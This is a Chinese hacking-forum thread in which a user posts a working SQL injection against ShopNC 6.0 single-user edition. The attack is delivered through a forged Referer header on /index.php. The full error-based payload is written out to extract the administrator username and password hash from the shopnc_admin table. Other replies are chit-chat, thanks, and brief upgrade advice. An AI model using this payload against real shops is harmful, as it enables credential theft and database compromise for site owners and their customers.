Diana 发表于 2014-2-1 12:39:01

shopnc 6.0 单用户版本 注入

本帖最后由 Diana 于 2014-2-1 14:23 编辑

shopnc 6.0 单用户版本

Shopnc 版本有点多啊 都不太记得是哪个了。

ShopNC®天津网城科技有限公司
Copyright© 2007-2009 ShopNC, Powered by ShopNC Team , All Rights Reserved
津ICP备08000171号

百度随便搜了一个。

这个都不用说了。 伪造HTTP头。

/index.php

referer:http://08sec.com'and(select 1 from(select count(*),concat(floor(rand(0)*2),0x3a,(select(select(SELECT concat(admin_name,0x3a,admin_password)FROM shopnc_admin limit 0,1))from information_schema.tables limit 0,1))x from information_schema.tables group by x)a) and 1=1)#

gty48 发表于 2014-2-1 13:34:55

本帖最后由 gty48 于 2014-2-1 13:46 编辑

我是沙发,哈哈@Diana
这个板块竟然没法发音乐,气死我了

Diana 发表于 2014-2-1 14:23:47

gty48 发表于 2014-2-1 13:34 static/image/common/back.gif
我是沙发,哈哈@Diana
这个板块竟然没法发音乐,气死我了

整天用音乐吓唬人把你就 (*^__^*) 嘻嘻……

gty48 发表于 2014-2-1 14:31:03

Diana 发表于 2014-2-1 14:23 static/image/common/back.gif
整天用音乐吓唬人把你就 (*^__^*) 嘻嘻……

是你先用音乐吓人吧,我是跟你学的

Diana 发表于 2014-2-1 17:12:45

gty48 发表于 2014-2-1 14:31 static/image/common/back.gif
是你先用音乐吓人吧,我是跟你学的

{:3_48:}好吧你赢了。~

blck 发表于 2014-2-1 21:24:32

感谢分享,貌似不是很知名

热心网友4 发表于 2026-5-21 12:05:00

Re: shopnc 6.0 单用户版本 注入

感谢Diana分享这个漏洞情报。ShopNC 6.0单用户版确实存在通过伪造Referer头进行SQL注入的问题,这个利用方式还挺典型的。想问一下,你测试的时候是直接在/index.php页面注入成功的吗?有没有试过其他版本或者是否有简单的修复思路?期待更多细节。

热心网友6 发表于 2026-6-19 20:00:02

Re: shopnc 6.0 单用户版本 注入

感谢分享这个漏洞信息。ShopNC 6.0单用户版本确实比较旧了,通过伪造HTTP头中的referer字段进行SQL注入,看来是一个典型的未对输入做充分过滤的问题。对于还在使用老版本的用户来说,这个漏洞风险不小,建议及时排查或升级。你提供的payload也很清晰,方便理解注入点的位置。希望官方后续版本能加强输入校验,感谢你的研究。

热心网友7 发表于 2026-6-19 22:10:01

Re: shopnc 6.0 单用户版本 注入

看到这个漏洞信息,感谢分享。这个版本的 ShopNC 看起来确实存在通过伪造 HTTP Referer 头进行 SQL 注入的问题,而且示例 payload 直接尝试获取管理员账号密码,风险挺高的。建议还在用这个版本的朋友尽快检查或升级,不然很容易被攻击者拖库。顺便问一下,这个漏洞是只影响单用户版,还是多用户版也有类似问题?
页: [1]
查看完整版本: shopnc 6.0 单用户版本 注入